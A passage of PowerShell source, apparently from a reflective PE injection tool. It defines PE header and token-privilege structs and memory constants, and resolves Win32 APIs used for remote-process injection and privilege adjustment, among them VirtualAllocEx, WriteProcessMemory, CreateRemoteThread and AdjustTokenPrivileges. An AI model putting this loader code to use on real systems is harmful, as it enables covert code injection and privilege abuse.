'Public')).SetOffset(36) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null\n\t\t($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null\n\t\t($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null\n\t\t($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null\n\t\t($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null\n\t\t($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null\n\t\t($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null\n\t\t($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null\n\t\t($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null\n\t\t($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null\n\t\t($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null\n\t\t($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null\n\t\t($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null\n\t\t($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null\n\t\t($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null\n\t\t($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null\n\t\t($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null\n\t\t($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null\n\t\t($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null\n\t\t($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null\n\t\t($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null\n\t\t($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null\n\t\t($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null\n\t\t$IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32\n\n\t\t#Struct IMAGE_NT_HEADERS64\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)\n\t\t$TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null\n\t\t$IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64\n\t\t\n\t\t#Struct IMAGE_NT_HEADERS32\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)\n\t\t$TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null\n\t\t$IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32\n\n\t\t#Struct IMAGE_DOS_HEADER\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)\n\t\t$TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null\n\n\t\t$e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')\n\t\t$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray\n\t\t$FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))\n\t\t$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4))\n\t\t$e_resField.SetCustomAttribute($AttribBuilder)\n\n\t\t$TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null\n\n\t\t$e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal')\n\t\t$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray\n\t\t$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10))\n\t\t$e_res2Field.SetCustomAttribute($AttribBuilder)\n\n\t\t$TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null\n\t\t$IMAGE_DOS_HEADER = $TypeBuilder.CreateType()\t\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER\n\n\t\t#Struct IMAGE_SECTION_HEADER\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40)\n\n\t\t$nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal')\n\t\t$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray\n\t\t$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8))\n\t\t$nameField.SetCustomAttribute($AttribBuilder)\n\n\t\t$TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null\n\t\t$IMAGE_SECTION_HEADER = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER\n\n\t\t#Struct IMAGE_BASE_RELOCATION\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8)\n\t\t$TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null\n\t\t$IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION\n\n\t\t#Struct IMAGE_IMPORT_DESCRIPTOR\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20)\n\t\t$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null\n\t\t$IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR\n\n\t\t#Struct IMAGE_EXPORT_DIRECTORY\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40)\n\t\t$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null\n\t\t$IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY\n\t\t\n\t\t#Struct LUID\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)\n\t\t$TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null\n\t\t$LUID = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID\n\t\t\n\t\t#Struct LUID_AND_ATTRIBUTES\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)\n\t\t$TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null\n\t\t$LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES\n\t\t\n\t\t#Struct TOKEN_PRIVILEGES\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)\n\t\t$TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null\n\t\t$TOKEN_PRIVILEGES = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES\n\n\t\treturn $Win32Types\n\t}\n\n\tFunction Get-Win32Constants\n\t{\n\t\t$Win32Constants = New-Object System.Object\n\t\t\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2\n\t\t$Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0\n\t\t\n\t\treturn $Win32Constants\n\t}\n\n\tFunction Get-Win32Functions\n\t{\n\t\t$Win32Functions = New-Object System.Object\n\t\t\n\t\t$VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc\n\t\t$VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])\n\t\t$VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc\n\t\t\n\t\t$VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx\n\t\t$VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])\n\t\t$VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx\n\t\t\n\t\t$memcpyAddr = Get-ProcAddress msvcrt.dll memcpy\n\t\t$memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr])\n\t\t$memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy\n\t\t\n\t\t$memsetAddr = Get-ProcAddress msvcrt.dll memset\n\t\t$memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr])\n\t\t$memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset\n\t\t\n\t\t$LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA\n\t\t$LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr])\n\t\t$LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary\n\t\t\n\t\t$GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress\n\t\t$GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr])\n\t\t$GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress\n\t\t\n\t\t$GetProcAddressOrdinalAddr = Get-ProcAddress kernel32.dll GetProcAddress\n\t\t$GetProcAddressOrdinalDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr])\n\t\t$GetProcAddressOrdinal = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressOrdinalAddr, $GetProcAddressOrdinalDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressOrdinal -Value $GetProcAddressOrdinal\n\t\t\n\t\t$VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree\n\t\t$VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool])\n\t\t$VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree\n\t\t\n\t\t$VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx\n\t\t$VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool])\n\t\t$VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx\n\t\t\n\t\t$VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect\n\t\t$VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])\n\t\t$VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect\n\t\t\n\t\t$GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA\n\t\t$GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])\n\t\t$GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle\n\t\t\n\t\t$FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary\n\t\t$FreeLibraryDelegate = Get-DelegateType @([Bool]) ([IntPtr])\n\t\t$FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary\n\t\t\n\t\t$OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess\n\t    $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])\n\t    $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess\n\t\t\n\t\t$WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject\n\t    $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32])\n\t    $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject\n\t\t\n\t\t$WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory\n        $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])\n        $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory\n\t\t\n\t\t$ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory\n        $ReadProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])\n        $ReadProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReadProcessMemoryAddr, $ReadProcessMemoryDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory\n\t\t\n\t\t$CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread\n        $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])\n        $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value $CreateRemoteThread\n\t\t\n\t\t$GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread\n        $GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool])\n        $GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetExitCodeThreadAddr, $GetExitCodeThreadDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread\n\t\t\n\t\t$OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken\n        $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool])\n        $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken\n\t\t\n\t\t$GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread\n        $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr])\n        $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread\n\t\t\n\t\t$AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges\n        $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool])\n        $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges\n\t\t\n\t\t$LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA\n        $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], [IntPtr]) ([Bool])\n        $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue\n\t\t\n\t\t$ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf\n        $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool])\n        